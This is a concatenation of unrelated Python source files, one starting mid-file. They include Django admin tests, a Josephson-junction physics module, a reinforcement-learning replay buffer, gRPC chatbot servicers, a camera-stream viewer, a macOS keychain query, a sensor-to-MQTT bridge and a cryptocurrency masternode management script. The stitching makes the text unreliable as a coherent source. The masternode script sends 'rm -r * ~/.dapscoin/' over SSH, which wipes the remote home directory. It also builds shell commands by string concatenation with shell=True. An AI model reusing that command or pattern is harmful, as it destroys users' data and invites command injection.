Family 0', ) response = self.client.get(list_url + '?o=name') self.assertContains(response, 'Given 12 Family 12') self.assertContains( response, ' name') self.assertContains( response, ' is active') response = self.client.get(list_url + '?o=-name') self.assertContains(response, 'Given 99 Family 99') self.assertContains( response, ' name') self.assertContains( response, ' is active') response = self.client.get(list_url + '?o=is_active') self.assertContains(response, 'Given 14 Family 14') self.assertNotContains(response, 'Given 12 Family 12') # inactive self.assertContains( response, ' name') self.assertContains( response, ' is active') # TODO multiple choice fields # TODO SearchForm.default # TODO autocompletion widget tests? 0 """Resistively and capacitively shunted junction (RCSJ) model. For details, see Tinkham §6.3. All units are SI unless explicitly stated otherwise. The following notation is used: Ic critical_current R resistance C capacitance """ import numpy as np from scipy.constants import e, hbar def plasma_frequency(Ic, C): return np.sqrt(2 * e * Ic / (hbar * C)) def quality_factor(Ic, R, C): """Compute the quality factor of an RCSJ. The quality factor distinguishes overdamped (Q < 1) from underdamped (Q > 1) junctions. """ return plasma_frequency(Ic=Ic, C=C) * R * C def retrapping_current(Ic, R, C): """Estimate the retrapping current of an underdamped (hysteretic) RCSJ.""" return 4 * Ic / (np.pi * quality_factor(Ic=Ic, R=R, C=C)) # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import copy import random from parl.common.error_handling import * class Experience(object): def __init__(self, sensor_inputs, states, actions, game_status): check_type_error(list, type(sensor_inputs)) self.sensor_inputs = sensor_inputs # (observation, reward) self.states = states # other states self.actions = actions # actions taken self.game_status = game_status # game status, e.g., max_steps or # episode end reached self.next_exp = None # copy of the next Experience def set_next_exp(self, next_exp): self.next_exp = copy.deepcopy(next_exp) #TODO: write copy function class Sample(object): """ A Sample represents one or a sequence of Experiences """ def __init__(self, i, n): self.i = i # starting index of the first experience in the sample self.n = n # length of the sequence def __repr__(self): return str(self.__class__) + ": " + str(self.__dict__) class ReplayBuffer(object): def __init__(self, capacity, exp_type=Experience): """ Create Replay buffer. Args: exp_type(object): Experience class used in the buffer. capacity(int): Max number of experience to store in the buffer. When the buffer overflows the old memories are dropped. """ check_gt(capacity, 1) self.buffer = [] # a circular queue to store experiences self.capacity = capacity # capacity of the buffer self.last = -1 # the index of the last element in the buffer self.exp_type = exp_type # Experience class used in the buffer def __len__(self): return len(self.buffer) def buffer_end(self, i): return i == self.last def next_idx(self, i): if self.buffer_end(i): return -1 else: return (i + 1) % self.capacity def add(self, exp): """ Store one experience into the buffer. Args: exp(self.exp_type): the experience to store in the buffer. """ check_type_error(self.exp_type, type(exp)) # the next_exp field should be None at this point check_eq(exp.next_exp, None) if len(self.buffer) < self.capacity: self.buffer.append(None) self.last = (self.last + 1) % self.capacity self.buffer[self.last] = copy.deepcopy(exp) def sample(self, num_samples): """ Generate a batch of Samples. Each Sample represents a sequence of Experiences (length>=1). And a sequence must not cross the boundary between two games. Args: num_samples(int): Number of samples to generate. Returns: A generator of Samples """ if len(self.buffer) <= 1: yield [] for _ in xrange(num_samples): while True: idx = random.randint(0, len(self.buffer) - 1) if not self.buffer_end(idx) and not self.buffer[ idx].game_status: break yield Sample(idx, 1) def get_experiences(self, sample): """ Get Experiences from a Sample Args: sample(Sample): a Sample representing a sequence of Experiences Return(list): a list of Experiences """ exps = [] p = sample.i for _ in xrange(sample.n): check_last_exp_error( self.buffer_end(p) or self.buffer[p].game_status, p, self.buffer[p].game_status) # make a copy of the buffer element as e may be modified somewhere e = copy.deepcopy(self.buffer[p]) p = self.next_idx(p) e.set_next_exp(self.buffer[p]) exps.append(e) return exps class FerrisWheelConfig: speed_limit = 100 speed_increment = 10 max_degrees = 359 check_button_press_wait_seconds = 2# Copyright 2021 ONDEWO GmbH # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an AS IS BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from abc import ABCMeta, abstractmethod from typing import Dict, Callable, List, Optional import grpc from ondewo.nlu import session_pb2, intent_pb2, user_pb2, context_pb2 from ondewo.nlu.client import Client as NLUClient from ondewo.logging.decorators import Timer from ondewo.logging.logger import logger_console from ondewo_bpi.autocoded.agent_grpc_autocode import AutoAgentsServicer from ondewo_bpi.autocoded.aiservices_grpc_autocode import AutoAiServicesServicer from ondewo_bpi.autocoded.context_grpc_autocode import AutoContextsServicer from ondewo_bpi.autocoded.entity_type_grpc_autocode import AutoEntityTypesServicer from ondewo_bpi.autocoded.intent_grpc_autocode import AutoIntentsServicer from ondewo_bpi.autocoded.project_role_grpc_autocode import AutoProjectRolesServicer from ondewo_bpi.autocoded.session_grpc_autocode import AutoSessionsServicer from ondewo_bpi.autocoded.user_grpc_autocode import AutoUsersServicer from ondewo_bpi.constants import SipTriggers, QueryTriggers from ondewo_bpi.message_handler import MessageHandler, SingleMessageHandler from ondewo_bpi.helpers import get_session_from_response class BpiSessionsServices(AutoSessionsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass def __init__(self) -> None: self.intent_handlers: Dict[str, Callable] = {} self.trigger_handlers: Dict[str, Callable] = { i.value: self.trigger_function_not_implemented for i in [*SipTriggers, *QueryTriggers] } def register_intent_handler(self, intent_name: str, handler: Callable) -> None: self.intent_handlers[intent_name] = handler def register_trigger_handler(self, trigger: str, handler: Callable) -> None: self.trigger_handlers[trigger] = handler def trigger_function_not_implemented( self, response: session_pb2.DetectIntentResponse, message: intent_pb2.Intent.Message, trigger: str, found_triggers: Dict[str, List[str]], ) -> None: logger_console.warning( { "message": f"no function for the trigger {trigger}, please subclass and implement", "trigger": trigger, "content": found_triggers[trigger], } ) def DetectIntent( self, request: session_pb2.DetectIntentRequest, context: grpc.ServicerContext ) -> session_pb2.DetectIntentResponse: try: text = request.query_input.text.text except Exception: logger_console.exception("something wrong in the bpi") text = "error" logger_console.warning( { "message": f"CAI-DetectIntentRequest to CAI, text input: {text}", "content": text, "text": text, "tags": ["text"], } ) cai_response = self.perform_detect_intent(request) intent_name = cai_response.query_result.intent.display_name logger_console.warning( { "message": f"CAI-DetectIntentResponse from CAI, intent_name: {intent_name}", "content": intent_name, "intent_name": intent_name, "session_id": get_session_from_response(cai_response), "tags": ["text"], } ) cai_response = self.process_messages(cai_response) return self.process_intent_handler(cai_response) @Timer(log_arguments=False, recursive=True) def perform_detect_intent(self, request: session_pb2.DetectIntentRequest, ) -> session_pb2.DetectIntentResponse: return self.client.services.sessions.detect_intent(request) @Timer(log_arguments=False, recursive=True) def process_messages(self, response: session_pb2.DetectIntentResponse, ) -> session_pb2.DetectIntentResponse: new_response = None for j, message in enumerate(response.query_result.fulfillment_messages): found_triggers = MessageHandler.get_triggers(message, get_session_from_response(response)) for found_trigger in found_triggers: new_response = self.trigger_handlers[found_trigger](response, message, found_trigger, found_triggers) if new_response: if not new_response.response_id == response.response_id: return new_response for found_trigger in found_triggers: SingleMessageHandler.substitute_pattern_in_message(message, found_trigger, "") self.quicksend_to_api(response, message, j) if not len(response.query_result.fulfillment_messages): self.quicksend_to_api(response, None, 0) return response def quicksend_to_api( self, response: session_pb2.DetectIntentResponse, message: Optional[intent_pb2.Intent.Message], count: int ) -> None: logger_console.warning({"message": "quicksend_to_api not written, please subclass and implement"}) @Timer(log_arguments=False, recursive=True) def process_intent_handler( self, cai_response: session_pb2.DetectIntentResponse ) -> session_pb2.DetectIntentResponse: intent_name = cai_response.query_result.intent.display_name handler: Optional[Callable] = self.intent_handlers.get(intent_name) if handler is not None: cai_response = handler(cai_response) text = [i.text.text for i in cai_response.query_result.fulfillment_messages] logger_console.warning( { "message": f"BPI-DetectIntentResponse from BPI with text: {text}", "content": text, "text": text, "tags": ["text", "clean"], } ) return cai_response class BpiUsersServices(AutoUsersServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass def Login(self, request: user_pb2.LoginRequest, context: grpc.ServicerContext) -> user_pb2.LoginResponse: logger_console.info("login request handled by bpi") return user_pb2.LoginResponse(auth_token=self.client.services.users.metadata[0][1]) class BpiContextServices(AutoContextsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass def CreateContext( self, request: context_pb2.CreateContextRequest, context: grpc.ServicerContext ) -> context_pb2.Context: logger_console.info("passing create context request on to CAI") return self.client.services.contexts.create_context(request=request) class BpiAgentsServices(AutoAgentsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiEntityTypeServices(AutoEntityTypesServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiAiServicesServices(AutoAiServicesServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiIntentsServices(AutoIntentsServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass class BpiProjectRolesServices(AutoProjectRolesServicer): __metaclass__ = ABCMeta @property @abstractmethod def client(self) -> NLUClient: pass examples/index_of.py1-10 # built-in from typing import List # external import pytest # project import deal # if you have more than 2-3 contracts, # consider moving them from decorators into separate variable # like this: contract_for_index_of = deal.chain( # result is an index of items deal.post(lambda result: result >= 0), deal.ensure(lambda items, item, result: result < len(items)), # element at this position matches item deal.ensure( lambda items, item, result: items[result] == item, message='invalid match', ), # element at this position is the first match deal.ensure( lambda items, item, result: not any(el == item for el in items[:result]), message='not the first match', ), # LookupError will be raised if no elements found deal.raises(LookupError), deal.reason(LookupError, lambda items, item: item not in items), # no side-effects deal.has(), ) @contract_for_index_of def index_of(items: List[int], item: int) -> int: for index, el in enumerate(items): if el == item: return index raise LookupError @pytest.mark.parametrize('case', deal.cases(index_of)) def test_index_of(case): case() from django.urls import path from . import views app_name = 'home' urlpatterns = [ path('search/', views.search, name='search'), ] import numpy as np import cv2 import time from time import monotonic as chrono from reolinkapi import Camera import threading from constants import * # code to open the webcam def get_video_feed(): cv2.namedWindow("preview") vc = cv2.VideoCapture(0) while True: # Capture frame-by-frame ret, frame = vc.read() # Our operations on the frame come here gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Display the resulting frame cv2.imshow('frame', gray) if cv2.waitKey(1) & 0xFF == ord('q'): break # When everything done, release the capture vc.release() cv2.destroyWindow("preview") def save_video(time_limit=10): cap = cv2.VideoCapture(0) # Define the codec and create VideoWriter object fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480)) end_time = chrono() + time_limit while cap.isOpened() and chrono() < end_time: ret, frame = cap.read() if ret: out.write(frame) cv2.imshow('frame', frame) if cv2.waitKey(1) & 0xFF == ord('q'): break else: break # Release everything if job is finished cap.release() out.release() cv2.destroyAllWindows() return def extract_frames(path_out, frame_rate=1, time_limit=10): """ Parameters ---------- path_out: str, path to save the frames time_limit: float, optional time to record in seconds, default 10 frame_rate: int or float, optional Extract the frame every "frame_rate" seconds, default 1 Returns ------- """ count = 0 vc = cv2.VideoCapture(0) success, image = vc.read() success = True end_time = chrono() + time_limit while success and chrono() < end_time: vc.set(cv2.CAP_PROP_POS_MSEC, (count * 1000)) success, image = vc.read() cv2.imwrite(path_out + "/frame%d.jpg" % count, image) count += frame_rate def non_blocking(IP, name): print("calling non-blocking") def inner_callback(img): cv2.imshow(name, maintain_aspect_ratio_resize(img, width=600)) print("got the image non-blocking") key = cv2.waitKey(1) if key == ord('q'): cv2.destroyAllWindows() exit(1) c = Camera(IP, CAMERA_USER, CAMERA_PSWD) # t in this case is a thread t = c.open_video_stream(callback=inner_callback) print(t.is_alive()) while True: if not t.is_alive(): print("continuing") break # stop the stream # client.stop_stream() # Reolink api def blocking(IP, name): c = Camera(IP, CAMERA_USER, CAMERA_PSWD) # stream in this case is a generator returning an image (in mat format) stream = c.open_video_stream() # using next() # while True: # img = next(stream) # cv2.imshow("name", maintain_aspect_ratio_resize(img, width=600)) # print("got the image blocking") # key = cv2.waitKey(1) # if key == ord('q'): # cv2.destroyAllWindows() # exit(1) # or using a for loop for img in stream: cv2.imshow(name, maintain_aspect_ratio_resize(img, width=600)) # cv2.imshow("name", img) # print("got the image blocking") key = cv2.waitKey(1) if key == ord('q'): cv2.destroyAllWindows() exit(1) # Resizes a image and maintains aspect ratio def maintain_aspect_ratio_resize(image, width=None, height=None, inter=cv2.INTER_AREA): # Grab the image size and initialize dimensions dim = None (h, w) = image.shape[:2] # Return original image if no need to resize # if width is None and height is None: # return image # We are resizing height if width is none if width is None: if height is None: return image # Calculate the ratio of the height and construct the dimensions r = height / float(h) dim = (int(w * r), height) # We are resizing width if height is none # else: # Calculate the ratio of the 0idth and construct the dimensions r = width / float(w) dim = (width, int(h * r)) # Return the resized image return cv2.resize(image, dim, interpolation=inter) if __name__ == '__main__': # blocking(CAMERA_IP) # blocking(CAMERA_IP_2) threads = [] for i in range(3): t = threading.Thread(target=non_blocking(CAMERA_IP_LST[i], "cam" + str(i+1))) t.daemon = True threads.append(t) for i in range(3): threads[i].start() # for i in range(3): # threads[i].join() Examples/Scripts/test.py1-10 import array import Security status, kc = Security.SecKeychainOpen('~/Library/Keychains/login.keychain', None) if status: raise Exception('Couldnt open keychain') status, settings = Security.SecKeychainCopySettings(kc, None) if status: raise Exception('Couldnt get settings') print(settings) status, searchList = Security.SecKeychainCopyDomainSearchList(Security.kSecPreferencesDomainUser, None) if status: raise Exception('Couldnt get user domain search list') print(searchList) # for sl in searchList: # path_len = 1024 # #path_buf = array.array('c','\0'*path_len) # path_buf = "" # status, path_len, path_buf = Security.SecKeychainGetPath(sl, path_len, path_buf) # print(path_buf[:path_len].tostring()) # status, access = Security.SecKeychainCopyAccess(kc, None) # if status != 0: # errMsg = Security.SecCopyErrorMessageString(status, None) # raise Exception('Couldnt copy access: {}'.format(errMsg)) # # print(access) # status, kcstatus = Security.SecKeychainGetStatus(kc, None) # if status: # raise Exception('Cant get status') # # print(kcstatus) status, result = Security.SecItemCopyMatching({ Security.kSecClass: Security.kSecClassCertificate, Security.kSecMatchLimit: Security.kSecMatchLimitAll }, None) print(result) 0 # rpi-arduino-dht11 # Raspberry Pi reads temperature and humidity sensor data from Arduino import serial, string, time from serial import Serial import paho.mqtt.publish as publish # In this example /dev/ttyUSB0 is used # This may change in your case to /dev/ttyUSB1, /dev/ttyUSB2, etc. ser = serial.Serial('/dev/ttyACM0', 9600) # MQTT declaration part MQTT_SERVER = "localhost" MQTT_PATH = "Sensors" # The following block of code works like this: # If serial data is present, read the line, decode the UTF8 data, # ...remove the trailing end of line characters # ...split the data into temperature and humidity # ...remove the starting and ending pointers (< >) # ...print the output while True: if ser.in_waiting > 0: rawserial = ser.readline() cookedserial = rawserial.decode('utf-8').strip('\r\n') datasplit = cookedserial.split(',') temperature = datasplit[0].strip('<') temperature = int(float(temperature)) Gaslevel = int(datasplit[1]) Ldr = int(datasplit[2]) Piezo = int(datasplit[3]) hic = int(datasplit[4]) humidity = datasplit[5].strip('>') humidity = int(float(humidity)) flame = int(datasplit[6]) co2 = int(datasplit[7].strip('>')) print(temperature) print(Gaslevel) print(Ldr) print(Piezo) print(hic) print(humidity) print(flame) print(co2) data = [temperature, Gaslevel, Ldr, Piezo, hic, humidity, flame, co2] payload = str(data) publish.single(MQTT_PATH, payload, hostname=MQTT_SERVER) time.sleep(1) syd/syd_tabular.py #!/usr/bin/env python3 import datetime import colored import os import syd import re from tokenize import tokenize, NUMBER from io import BytesIO from box import Box, BoxKeyError, BoxList from functools import reduce from operator import attrgetter from string import Formatter # ----------------------------------------------------------------------------- def tabular_get_line_format(db, table_name, format_name, element): ''' Retrieve the line format from the format name to build a tabluar ''' table_name = syd.guess_table_name(db, table_name) formats = syd.find(db['PrintFormat'], table_name=table_name) df = None ff = None for f in formats: if f.name == format_name: df = f.format ff = f if df == None and format_name != 'raw': s = "Cannot find the format '" + format_name + "' in table '" + table_name + "' using 'raw'" syd.warning(s) format_name = 'raw' if format_name == 'raw': df = '' for k in element: df += '{' + str(k) + '} ' sorting_key = '' if ff: if 'sorting_key' in ff: sorting_key = ff.sorting_key return df, sorting_key # ----------------------------------------------------------------------------- def get_nested_info(db, field_name): fields = field_name.split('.') # re.findall(r'(\w)\.(\w)', field_name) a = Box() a.table_names = [] a.tables = [] a.field_id_names = [] a.field_format_name = '' for f in fields[0:-1]: tname = syd.guess_table_name(db, f) if tname in db: table = db[tname] else: table = None a.table_names.append(tname) a.tables.append(table) a.field_id_names.append(f + '_id') a.field_format_name += f + '->' a.field_format_name += fields[-1] a.field_name = fields[-1] a.initial_field_name = field_name return a # ----------------------------------------------------------------------------- def get_sub_element(db, element, tables, field_id_names): se = element for table, field_id in zip(tables, field_id_names): if table: se = syd.find_join_one(se, table, field_id) else: return None return se # ----------------------------------------------------------------------------- def get_sub_elements(db, elements, format_info, subelements): # format_info.field_format_name, # study->patient->name # format_info.tables, # DicomStudy Patient # format_info.field_id_names, # study_id patient_id # format_info.field_name) # name # get al subelements current_table = format_info.tables[0] current_field_id_name = format_info.field_id_names[0] ids = [elem[current_field_id_name] for elem in subelements] ## repetition, unique ? FIXME new_subelements = syd.find(current_table, id=ids) if len(format_info.tables) == 1: # correspondance current_id -> new_id subelements_map = {} for s in new_subelements: try: subelements_map[s.id] = s[format_info.field_name] except: subelements_map[s.id] = '?' for elem in elements: index = elem[format_info.field_format_name] if index: # because can be None elem[format_info.field_format_name] = subelements_map[index] else: elem[format_info.field_format_name] = '?' return elements # correspondance current_id -> new_id subelements_map = {} for s in new_subelements: subelements_map[s.id] = s[format_info.field_id_names[1]] # change the id for elem in elements: index = elem[format_info.field_format_name] if index: elem[format_info.field_format_name] = subelements_map[index] # recurse removing the first format_info.tables = format_info.tables[1:] format_info.field_id_names = format_info.field_id_names[1:] return get_sub_elements(db, elements, format_info, new_subelements) # ----------------------------------------------------------------------------- def get_all_nested_info(db, line_format): subelements = re.findall(r'{(\w+)\.(.*?)[:\}]', line_format) nesteds = [] for e in subelements: a = get_nested_info(db, e[0] + '.' + e[1]) nesteds.append(a) return nesteds # ----------------------------------------------------------------------------- def tabular_add_nested_elements(db, table_name, elements, line_format): # get information about all nesteds (such as patient->name fields_info = syd.get_all_nested_info(db, line_format) for sub in fields_info: for elem in elements: elem[sub.field_format_name] = elem[sub.field_id_names[0]] ## FIRST TIME ONLY se = get_sub_elements(db, elements, sub, elements) for sub in fields_info: line_format = line_format.replace(sub.initial_field_name, sub.field_format_name) return line_format # ----------------------------------------------------------------------------- def tabular_add_special_fct(db, table_name, elements, line_format): subelements = re.findall(r'{(.*?)[:\}]', line_format) for sub in subelements: if sub == 'abs_filename': tabular_add_abs_filename(db, table_name, elements) if sub == 'time_from_inj': tabular_add_time_from_inj(db, table_name, elements) if sub == 'nb_dicom_files': tabular_add_nb_dicom_files(db, table_name, elements) # ----------------------------------------------------------------------------- def tabular_add_abs_filename(db, table_name, elements): # only for image, dicomstudy, dicomseries, dicomfile # image -> file_mhd_id file_raw_id => file # study -> NO # series -> => dicomfile => file_id ; several so only first one or all ? if table_name == 'DicomSeries': ids = [e.id for e in elements] dicomfiles = syd.find(db['DicomFile'], dicom_series_id=ids) ids = [df.file_id for df in dicomfiles] files = syd.find(db['File'], id=ids) map_df = {df.dicom_series_id: df for df in dicomfiles} # keep only one map_f = {f.id: f for f in files} # keep only one for e in elements: try: df = map_df[e.id] f = map_f[df.id] e['abs_filename'] = syd.get_file_absolute_filename(db, f) except: e['abs_filename'] = 'file_does_not_exist' # print('warning, cannot find', e.id, df.id) if table_name == 'DicomFile': ids = [e.file_id for e in elements] files = syd.find(db['File'], id=ids) map_f = {f.id: f for f in files} for e in elements: try: f = map_f[e.file_id] e['abs_filename'] = syd.get_file_absolute_filename(db, f) except: e['abs_filename'] = 'file_does_not_exist' # print('warning, cannot find', e.id, df.id) if table_name == 'Image': ids = [e.file_mhd_id for e in elements] files = syd.find(db['File'], id=ids) map_f = {f.id: f for f in files} for e in elements: try: f = map_f[e.file_mhd_id] e['abs_filename'] = syd.get_file_absolute_filename(db, f) except: e['abs_filename'] = 'file_does_not_exist' # print('warning, cannot find', e.id, df.id) # ----------------------------------------------------------------------------- def tabular_add_nb_dicom_files(db, table_name, elements): if table_name != 'DicomSeries': return for e in elements: dicomfiles = syd.find(db['DicomFile'], dicom_series_id=e.id) e['nb_dicom_files'] = len(dicomfiles) # ----------------------------------------------------------------------------- def tabular_add_time_from_inj(db, table_name, elements): if table_name != 'DicomSeries' and table_name != 'Image': return ids = [e.injection_id for e in elements] injections = syd.find(db['Injection'], id=ids) map_inj = {inj.id: inj for inj in injections} # keep only one for e in elements: if not e.injection_id in map_inj: continue inj = map_inj[e.injection_id] date1 = inj.date date2 = e.acquisition_date # print(date1, date2) e.time_from_inj = date2 - date1 # ----------------------------------------------------------------------------- def get_field_value(field_name, mapping): ''' http://ashwch.github.io/handling-missing-keys-in-str-format-map.html To handle missing field in tabular_str ''' try: if '.' not in field_name: return mapping[field_name], True else: obj, attrs = field_name.split('.', 1) return attrgetter(attrs)(mapping[obj]), True except Exception as e: return field_name, False # ----------------------------------------------------------------------------- def str_format_map(format_string, mapping): ''' http://ashwch.github.io/handling-missing-keys-in-str-format-map.html To handle missing field in tabular_str ''' f = Formatter() parsed = f.parse(format_string) output = [] for literal_text, field_name, format_spec, conversion in parsed: conversion = '!' + conversion if conversion is not None else '' format_spec = ':' + format_spec if format_spec else '' if field_name is not None: field_value, found = get_field_value(field_name, mapping) if not found or field_value == '?': text = '?' else: format_string = '{{{}{}}}'.format(conversion, format_spec) if not field_value: text = '?' else: text = format_string.format(field_value) output.append(literal_text + text) text = '' return ''.join(output) # ----------------------------------------------------------------------------- def tabular_str(format_line, elements): ''' Dump some elements with a tabular ''' # check try: # t = format_line.format_map(SafeKey(d)) t = str_format_map(format_line, elements[0]) except BoxKeyError as err: s = "Error while formating " + str(err) + " probably does not exist in this table" raise_except(s) s = '' for e in elements: # s += format_line.format_map(d) s += str_format_map(format_line, e) + '\n' # remove last element (final break line) s = s[:-1] return s # ----------------------------------------------------------------------------- def grep_elements_old(elements, format_line, grep): ''' Filter elements. Only keep the ones that match grep ''' lines = [syd.str_format_map(format_line, elem) for elem in elements] s = '' if len(grep) == 0: for l in lines: s += l + '\n' if len(s) > 0: s = s[:-1] # remove last break line return elements, s for g in grep: vgrep = False kelements = [] klines = [] if g[0] == '%': vgrep = True g = g[1:] for e, l in zip(elements, lines): if re.search(g, l): if not vgrep: kelements.append(e) klines.append(l) else: if vgrep: kelements.append(e) klines.append(l) elements = kelements lines = klines for l in lines: s += l + '\n' if len(s) > 0: s = s[:-1] # remove last break line return elements, s # ----------------------------------------------------------------------------- def grep_elements(elements, grep): """ Filter elements. Only keep the ones that match grep """ res = [] for e in elements: keep_it = True for g in grep: s = ' '.join(str(v) for v in e.values()) if s.find(g) == -1: keep_it = False if keep_it: res.append(e) return res # ----------------------------------------------------------------------------- def grep(db, table_name, elements, line_format_name='default', grep=[]): ''' Simple print/grep helper function ''' if len(elements) < 1: return elements, '' # Get line format line_format, sorting_key = syd.tabular_get_line_format(db, table_name, line_format_name, elements[0]) # add nested elements lf = syd.tabular_add_nested_elements(db, table_name, elements, line_format) syd.tabular_add_special_fct(db, table_name, elements, line_format) # perform grep elements, s = syd.grep_elements(elements, lf, grep) # return return elements, s print('Starting script') from time import sleep from pexpect import pxssh import configparser from config import args, ssh, send, sendFile, disconnect, config as s from subprocess import call, Popen, PIPE, STDOUT from getpass import getpass def status(servers = s['servers']): for server in servers: print '\033[94m'+server['name']+' - '+server['address']+'\033[0m' try: connect = ssh(server) if connect: print '\033[92m'+send(connect, 'uptime')+'\033[0m' if (s['main']['name']==server['name']): #status checks for main server res = send(connect, "ps -e|grep mongo") if (len(res)>21): print '\033[92m'+res+'\033[0m' else: print '\033[91m'+res+'\nNo mongo service detected\033[0m' res = send(connect, "ps -e|grep node") if (len(res)>21): print '\033[92m'+res+'\033[0m' server['mongodown']=True else: print '\033[91m'+res+'\nNo node service detected\033[0m' server['nodedown']=True send(connect, 'dapscoin-cli '+s['serveroption']+'status') disconnect(connect) call('ping -c 1 '+server['address'], shell=True) else: send(connect, 'dapscoin-cli '+s['serveroption']+' masternode status') send(connect, 'dapscoin-cli '+s['serveroption']+' getbalance') disconnect(connect) print("\n\n") sleep(2) else: server['down']=True except pxssh.ExceptionPxssh, err: print str(err) # def stop(): # for server in s['servers']: # print 'wip' def stopAllWalletDaemons(servers=s['servers']): for server in servers: stopAWallet(server) def stopAWallet(server): connect = ssh(server) if connect: print("Trying to stop daemon:" + server['name'] + "\n") send(connect, 'dapscoin-cli '+s['serveroption']+' stop') sleep(2) #wait 2 seconds disconnect(connect) def startStakingWallets(servers, hard=False): for server in servers: startStakingWallet(server, hard) def startStakingWallet(server, hard=False):#Main server producing PoW blocks, hard=true meaning to erase block data and restart wallet if hard: removeBlockchainData(s['main']) genStakingnodeConfigs(s['servers'], s['main']) connect = ssh(server) if connect: send(connect, 'dapscoind '+s['serveroption']+' -daemon')#Start daemon sleep(2) #wait 2 seconds if server['address'] == s['main']['address']:#Start generating PoW blocks send(connect, 'dapscoin-cli '+s['serveroption']+' setgenerate true 1') #if hard: #Need to reindex explorer database disconnect(connect) def removeBlockDataFromServers(servers=s['servers']): for server in servers: removeBlockchainData(server) def removeBlockchainData(server): connect = ssh(server) if connect: send(connect, 'rm -r * ~/.dapscoin/') disconnect(connect) def startStakingServers(servers=s['servers']): for server in servers: startStaking(server) def startStaking(server): connect = ssh(server) if connect: result = send(connect, 'dapscoin-cli '+s['serveroption']+'getstakingstatus') print result if ((result.find('false')!=-1) or (result.find("couldn't")!=-1)): send(connect, 'dapscoind '+s['serveroption']+'stop') print "Waiting for 30 seconds..." sleep(30) send(connect, 'dapscoind '+s['serveroption']+' -daemon') send(connect, 'dapscoin-cli '+s['serveroption']+'') #unlock wallet disconnect(connect) def masternodeScript(stakingserver, masterservers=s['masterservers']): genStakingNodeConfigFileScript(masterservers, stakingserver) connect = ssh(stakingserver) if connect: send(connect, 'dapscoind '+s['serveroption']+'-daemon') key = send(connect, 'dapscoin-cli '+s['serveroption']+'masternode genkey') if ((key[0].lower().find('not')==-1) and (key[0].lower().find('error')==-1)): for server in masterservers: genMasternodeConfigFileScript(server, stakingserver, key) else: print('could not complete process') def genMasternodeConfigFileScript(masterserver, stakingserver, nodeprivkey): dapsConfData = open('boot/config/dapscoin.conf', 'r').read()+'externalip='+masterserver['address']+'\nmasternodeprivkey='+nodeprivkey connect = ssh(masterserver) if connect: send(connect, 'mkdir ~/.dapscoin') send(connect, 'touch ~/.dapscoin/dapscoin.conf') send(connect, 'echo "'+dapsConfData+'">~/.dapscoin/dapscoin.conf') send(connect, 'dapscoin-cli '+s['serveroption']+'-daemon -connect '+stakingserver['address']) sleep(5) send(connect, 'dapscoin-cli '+s['serveroption']+'masternode genkey') disconnect(connect) def genStakingnodeConfigs(stakingservers=s['stakingnodes'], masterservers=s['masternodes']): for server in stakingservers: genStakingNodeConfigFileScript(server, masterservers) def genStakingNodeConfigFileScript(stakingserver, masterservers=s['masternodes']): nodes = '' for server in masterservers: nodes += 'addnode='+server['address']+'\n' dapsConfData = open('boot/config/dapscoin.conf', 'r').read() + nodes connect = ssh(stakingserver) if connect: send(connect, 'mkdir ~/.dapscoin') send(connect, 'touch ~/.dapscoin/dapscoin.conf') send(connect, 'echo "'+dapsConfData+'">~/dapscoin/dapscoin.conf') disconnect(connect) def restartAllWallets(hard=False, masternode=s['masternodes'][0]):#hard restart = erase data and start blockchain from beginning stopAllWalletDaemons() if hard: for server in s['servers']: removeBlockchainData(server) startStakingWallet(s['main']) print('Wait 10s for a number of PoW blocks generated\n') sleep(10) #start control wallet that controls the first masternode, this assume the machine running #this script is running control wallet mn1ip = masternode['address'] if hard: #1. Stop control wallet p = Popen('dapscoin-cli ' + s['serveroption'] + " stop", shell=True, stdout=PIPE, stderr=STDOUT) for line in p.stdout.readlines(): print line, sleep(2) #2. Start daemon Popen('dapscoind ' + s['serveroption'] + " -daemon", shell=True, stdout=PIPE, stderr=STDOUT) sleep(2) #3. generate masternodeprivatekey p = Popen('dapscoin-cli ' + s['serveroption'] + " masternode genkey", shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() mnprivateKey = lines[0] mnalias = "masternode1" #4. generate account p = Popen('dapscoin-cli ' + s['serveroption'] + " getaccountaddress " + mnalias, shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() accountAddress = lines[0] #5. send 10 000 daps to accountaddress txhash = transferFromMainWallet(accountAddress) if txhash: #check whether the transaction is confirmed confirmed = False while not confirmed: print('Checking tx masternode send confirmation\n') p = Popen('dapscoin-cli ' + s['serveroption'] + " masternode outputs", shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() if txhash in str(lines): confirmed = True else: print('cannot send daps to masternode') return 0 #6. create masternode.conf file mn1port = '53572' mnconfPath = '~/.dapscoin/masternode.conf' if s['serveroption'] == '-testnet': mn1port = '53575' mnconfPath = '~/.dapscoin/testnet4/masternode.conf' mnconfContent = mnalias + ' ' + mn1ip + ':' + mn1port + ' ' + mnprivateKey + ' ' + txhash + ' 1' Popen('echo "' + mnconfContent + '" >' + mnconfPath, shell=True, stdout=PIPE, stderr=STDOUT) #7. Start masternode daemon 